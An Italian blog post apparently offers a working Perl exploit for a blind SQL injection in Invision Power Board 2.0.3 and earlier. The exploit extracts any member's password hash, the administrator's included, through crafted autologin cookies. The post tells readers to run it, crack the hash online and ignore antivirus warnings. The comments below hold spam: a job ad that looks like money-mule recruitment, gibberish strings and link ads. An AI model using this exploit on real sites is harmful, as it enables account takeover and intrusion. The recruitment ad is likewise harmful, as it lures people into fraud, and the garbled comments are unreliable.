Cosa è un exploit?
Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un bug o una vulnerabilità, porta all’acquisizione di privilegi o al Denial Of Service di un computer.
Eccovi un exploit in perl corredato di istruzioni, si tratta di una SQL INJECTION, da provare sui vostri forum Invision Power Board, vi svela la password di un qualsiasi utente in formato hash MD5, quindi anche quella dell’amministratore! 
Dopo non dovrete far altro che crackare la password con un password cracker online: Passcracking.ru, Milw0rm.com o scaricatevi questo CrackerMD5 da usare in locale.
Le versioni col bug vanno dalla 1.x alla 2.0.3, basta compilare il codice sottostante con ActivePerl e lanciare il programma da DOS.
L’antivirus potrebbe segnalarvelo, ma tranquilli, procedete ugualmente.
Buon testing!
Codice:
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] RICERCA PASSWORD IN CORSO ... [|]";
($cmember_id = $member_id) =~
s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b IL SITO è FIXATO! ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 =
"%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh =
"%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%
26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21"
;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin
HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s;
pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_
hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v <= 2.0.3 SQL Injection exploit
============================================================
ISTRUZIONI:
************************************************************
ipbexploit.pl [Host] [/cartellaIPB/] [utente] [IPBversione]
[server] -> Host da attaccare
[/folder/] -> Cartella dove è installato IPB
[member_id] -> Numero dell'utente da attaccare
target:
0 -> per versioni 1.x
1 -> per versioni 2.x (fino alla 2.0.3)
Esempio ipbexploit.pl http://www.sitovittima.it /forums/ 1 1
**************************************************************
==============================================================
Tradotto in Italiano Da UnderGround0
About -> underground0@hotmail.it
Programmer: 1dt.w0lf; RST/GHC; http://ghc.ru
);
exit();
}
Hello
G’night
ImapExchange is a leading electronic funds transfer company with core
business values and a great concern for the general well being and
satisfaction of our customers. The scope of our expertise enables
ImapExchange to respond effectively to any challenge our clients care
to set us. ImapExchange is made up of a sophisticated network of agents in
six continents, having in common a blend of intelligence, talent and
expertise, harnessed to bring competitive advantage to the client. We
move money all over the world today and make every corner of the
world accessible to ImapExchange customers! For that reason, we shall be
happy to welcome you – people competent, pro-active, energetic and purposeful
- among our Company’s staff. If you do wish to join us, you should
demonstrate your ability to bring benefit to the Company, so forward
your resume to our HR manager at jolivette_lucas@yahoo.com and we shall be
happy to meet you.
To get high rankings in Yahoo and MSN is all about links? I can get ranked easier in Google with links,
but the other two I have no clue.
osbcrmdcrz gserkavjxn osbcrmdcrz gserkavjxn osbcrmdcrz gserkavjxn
osbcrmdcrz gserkavjxn osbcrmdcrzgserkavjxn
è il primo exploit che lanciato!
non riesco a compilarlo mi da sempre un casino di errori di sintassi
Chiedo scusa se posto qui,
ma avete idea per una buona chat community?
Saluti
——————-
http://www.faceland.it/index.php?option=com_gametrailers&Itemid=34
Magari ho sbagliato forum,
ma potreste consigliarmi per un’ottima chat?
Saluti
Hey Guys,
I am a student (limited budget) and have seen a few offers for free ipods and iphones. Does anyone Know if any if the free IPhone or Ipod offers are actually legit? I don’t want to waste my time filling out a hundred surveys and was hoping to hear from someone who may have had some success with this.
Thanks
@zinymegan: I do not know. It seems not possible and notice this, but I can not guarantee this 100%